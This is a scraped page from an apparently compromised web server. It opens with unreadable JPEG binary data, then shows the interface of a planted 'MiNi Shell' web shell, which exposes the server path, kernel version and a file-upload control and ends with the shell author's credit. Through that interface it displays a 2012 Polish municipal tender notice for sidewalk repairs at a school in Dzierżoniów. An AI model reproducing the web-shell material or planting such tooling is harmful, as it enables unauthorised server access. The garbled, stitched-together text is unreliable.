JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120424/92623-N-2012.html

<p class="kh_header"><b>Dzierżoniów: Wykonanie robót budowlanych dotyczących wykonania remontu chodnika
 i ciągu pieszo - jezdnego od strony frontowej szkoły i ciągu pieszo-jezdnego od strony parku osiedlowego przy likwidowanym śmietniku o łącznej powierzchni 940m2, w ramach realizacji zadania inwestycyjnego p.n.: Zagospodarowanie terenu wokół Szkoły Podstawowej nr 5 w Dzierżoniowie.</b><br>
<b>Numer ogłoszenia: 92623 - 2012; data zamieszczenia: 24.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Dzierżoniów , Rynek 1, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 74 6450800, faks 74 6450801.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dzierzoniow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie przewiduje się ustanowienia dynamicznego systemu zakupów</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych dotyczących wykonania remontu chodnika
 i ciągu pieszo - jezdnego od strony frontowej szkoły i ciągu pieszo-jezdnego od strony parku osiedlowego przy likwidowanym śmietniku o łącznej powierzchni 940m2, w ramach realizacji zadania inwestycyjnego p.n.: Zagospodarowanie terenu wokół Szkoły Podstawowej nr 5 w Dzierżoniowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia  obejmuje roboty w zakresie zagospodarowania terenu Szkoły Podstawowej nr 5 objęte decyzją pozwolenia na budowę nr 302/2009 z dnia 26.05.2009 r. 
i dotyczące: 
1)	Rozbiórki chodnika o nawierzchni asfaltowej wraz z podbudową, wzdłuż głównego budynku dydaktycznego,
2)	Rozbiórki części ciągu pieszo-jezdnego o nawierzchni asfaltowej wraz z podbudową,
3)	Rozbiórki ciągu pieszo-jezdnego o nawierzchni tłuczniowej,
4)	Rozbiórki krawężników i obrzeży,
5)	Rozbiórki wymurowanego z kamienia śmietnika o wymiarach 2,5m x 4,7m i wysokości 120cm, wraz z podłożem betonowym i fundamentem,
6)	Rozbiórki sprzed śmietnika, placu o wym. 3,4m x 6,1m o nawierzchni z płytek betonowych wraz z obrzeżami,
7)	Rozbiórki utwardzenia betonowego przy ścianie szczytowej budynku małej sali gimnastycznej (naprzeciwko rozbieranego śmietnika),
8)	Wykonania ciągów pieszo-jezdnych z kostki betonowej gr. 8 cm o wzmocnionej konstrukcji,
9)	Wykonania chodnika z kostki betonowej gr 6 cm wraz z podbudową,
10)	Ułożenia ograniczenia ciągów pieszo-jezdnych z obrzeży betonowych 8x30x100cm na ławie betonowej i oporze z chudego betonu,   
11)	Ułożenia ograniczenia chodników z obrzeży betonowych 8x30x100cm na zaprawie cementowo-piaskowej z oporem z chudego betonu,
12)	Wykonania opaski przy budynku z kostki betonowej gr. 6 cm na podsypce piaskowej gr. 10 cm i szerokości 60 cm ograniczonej obrzeżem chodnikowym,
13)	Regulacji do poziomu wykonywanej opaski przy budynku małej sali gimnastycznej  naświetli i zsypów piwnicznych - 4 szt.
14)	Zagospodarowania istniejących terenów zielonych w obrębie utwardzonych ciągów pieszo-jezdnych i chodnika poprzez rekultywację i niwelację terenu, wywóz nadmiaru ziemi, wzruszenie gruntu na głębokości co najmniej 10 cm, zagrabienie i obsianie trawą uniwersalną w ilości 0,3kg/m2. Świeży obsiew należy delikatnie zagrabić a następnie zawałować,
15)	Dowiezienia ziemi urodzajnej na powstałe tereny zielone po robotach rozbiórkowych.  Grubości ziemi urodzajnej nie mniejsza niż 10 cm,
16)	Regulacji studni kanalizacyjnych zlokalizowanych w ciągach pieszo-jezdnych 
i chodniku,
17)	Ułożenia na szerokości istniejącego wjazdu ppoż. krawężników drogowych najazdowych, na ławie betonowej.
2. Zakres robót został określony:
1)	Na rysunku zagospodarowania terenu nr Z-01,
2)	Kolorem niebieskim, granatowym i zielonym na rysunku zagospodarowania terenu nr Z-02,
3)	W opisie technicznym część architektoniczno - budowlana,
4)	W Specyfikacji technicznej wykonania i odbioru robót budowlanych - w zakresie zagospodarowania terenu. 
 3.Wykonawca, oprócz obowiązków wynikających z pkt.1, zobowiązuje się do:
1)	przejęcia terenu budowy i jego zabezpieczenia,
2)	należytego utrzymania terenu budowy, w tym między innymi zapewnienie dojścia do szkoły,
3)	organizacji zaplecza budowy oraz pomieszczeń socjalno-sanitarnych dla pracowników,
4)	zapewnienia dostawy niezbędnych mediów do realizacji robót i opłatę za ich dostawę,
5)	niezwłocznego wyczyszczenia nawierzchni ulic w przypadku nawożenia błota z terenu budowy na kołach maszyn, samochodów i innych urządzeń,
6)	uporządkowania terenu budowy i terenu przyległego po zakończeniu robót,
7)	wywozu materiału i gruzu z rozbiórki na składowisko odpadów i poniesienia kosztów składowania,
8)	wywozu asfaltu z rozbiórki do Wałbrzycha i jego utylizacji,
9)	 obsługi geodezyjnej w trakcie realizacji robót budowlanych, jak i do wykonania pomiaru geodezyjnego powykonawczego dostarczonego również w formie elektronicznej na CD (skan sekcji mapy rozdzielczej 300DPJ i formacie TIF), 
10)	wykonania badań i pomiarów w czasie wykonywania robót budowlanych i badań odbiorczych zgodnie ze specyfikacją techniczną wykonania i odbioru robót oraz wszystkich badań, sprawdzeń i pomiarów niezbędnych przy składaniu zawiadomienia 
o zakończeniu budowy w Powiatowym Inspektoracie Nadzoru Budowlanego,
11)	wykonania Planu Bezpieczeństwa i Ochrony Zdrowia,
12)	przedłożenia Zamawiającemu w dniu przekazania placu budowy uzgodnienia 
w zakresie gospodarki odpadami, wydanego na podstawie ustawy o odpadach,
13)	 dostarczenia Zamawiającemu oświadczenia kierownika budowy o przeszkoleniu      
 w zakresie BHP na stanowisku pracy pracowników zatrudnionych przy wykonywaniu robót związanych z realizacją przedmiotowego zamówienia w terminie 30 dni od daty przekazania placu budowy,
14)	przekazania Zamawiającemu oświadczenia o podjęciu obowiązków przez kierownika budowy w terminie 3 dni od daty podpisania umowy,
15)	uczestnictwa kierownika budowy w cotygodniowych naradach, na których m.in. będzie kontrolowane stosowania wymogów związanych z ochroną środowiska i BHP; informujemy, że Urząd wdrożył normę środowiskową PN-EN-ISO 14001:2005 oraz  BHP PN-N-18001:2004..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.11.12.91-4, 45.11.10.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać wykonanie w załączniku nr 6 do SIWZ robót budowlanych 
w zakresie budowy, przebudowy lub remontu dróg lub chodników o nawierzchni z kostki betonowej; wykazanie minimum 2 robót obejmujących swym zakresem powierzchnię minimum 900 m 2 każda z robót  wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, z podaniem jej rodzaju i wartości, daty i miejsca wykonania oraz załączenie dokumentu potwierdzającego, że robota została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykazać w załączniku nr 5 do SIWZ osobę, która będzie kierować robotami budowlanymi w  specjalności drogowej lub innej umożliwiającej wykonanie przedmiotu zamówienia wraz z podaniem informacji na temat jej kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia oraz informacji o podstawie dysponowania tą  osobą oraz złożenie oświadczenia, że osoba, która będzie kierować robotami budowlanymi  w/w branży, posiada wymagane uprawnienia -poprzez wypełnienie i podpisanie załącznika nr 5 do SIWZ. Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Możliwość wprowadzenia zmian umowy:
a)	W zakresie terminu:
1) w przypadku błędów lub braków projektowych (z winy projektanta lub nie) jest konieczna zmiana technologii wykonania robót budowlanych bądź wykonania zamówień dodatkowych by obiekt mógł spełniać swoje przeznaczenie, 
2) z powodu działania okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewiedzieć z pewnością w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
3) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
b) W przypadku wystąpienia robót zamiennych dopuszcza się zmianę umowy
 w zakresie terminu wykonania, wynagrodzenia w sytuacji gdy wystąpi:
1)	Podniesienie bezpieczeństwa
2)	Materiały budowlane przewidziane w umowie do wykonania zamówienia nie mogą być użyte przy realizacji inwestycji z powodu zaprzestania produkcji lub zastąpienia innymi.
3)	W trakcie wykonywania zamówienia nastąpiła zmiana przepisów prawa budowlanego, 
4)	W trakcie wykonywania zamówienia nastąpiła zmiana przepisów prawa mająca wpływ na opisany przedmiot zamówienia
5)	W trakcie realizacji zamówienia zastosowano lepsze materiały budowlane.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie i natychmiast odnotować to w wewnętrznym dzienniku budowy. Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania robót, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania robót w miejscu budowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.dzierzoniow.pl/pl/bip/zamowienia_publiczne/ogloszenia/powyzej_14/roboty_budowlane<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.05.2012 godzina 12:00, miejsce: Urząd Miasta Dzierżoniów, ul Rynek 1, Biuro Obsługi Klienta, stanowisko A - Informacja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com